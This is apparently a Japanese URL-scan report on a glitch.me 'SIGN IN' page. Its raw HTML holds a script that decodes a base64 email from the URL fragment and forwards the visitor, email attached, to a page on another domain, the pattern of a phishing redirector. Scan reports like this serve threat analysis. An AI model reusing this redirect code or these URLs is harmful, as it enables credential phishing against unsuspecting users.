https://heluniversalec.glitch.me/#

送信済みURL:
https://heluniversalec.glitch.me/#
レポート終了日:

リンク · 0件検出

ページから特定された発信リンク

JavaScript変数 · 5件検出

ページのウィンドウオブジェクトにロードされたグローバルのJavaScript変数は関数以外の場所で宣言された変数で、現在のスコープ内であればコードのどこからでもアクセス可能です

名前規模
onbeforetoggleobject
documentPictureInPictureobject
onscrollendobject
base64Decodefunction
hashstring

コンソールログメッセージ · 1件検出

Webコンソールにログ記録されたメッセージ

規模分類ログ
errornetwork
URL
https://heluniversalec.glitch.me/favicon.ico
テキスト
Failed to load resource: the server responded with a status of 404 ()

HTML

未加工のHTMLページ本文

<!DOCTYPE html><html lang="en"><head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>SIGN IN</title>
</head>
<body>
<script>
  function base64Decode(str) {
    try {
      return decodeURIComponent(atob(str).split('').map(function(c) {
        return '%' + ('00' + c.charCodeAt(0).toString(16)).slice(-2);
      }).join(''));
    } catch (e) {
      console.error('Invalid base64 string:', str);
      return null;
    }
  }

  var hash = window.location.hash;
  if (hash !== "") {
    hash = hash.substring(1); // Remove the '#' character
    const email = base64Decode(hash);

    if (email) {
      window.location.href = "https://sales5rrt.digital/hdqops/Nandsrotomould.html#" + (email);
    }
  }
</script>

</body></html>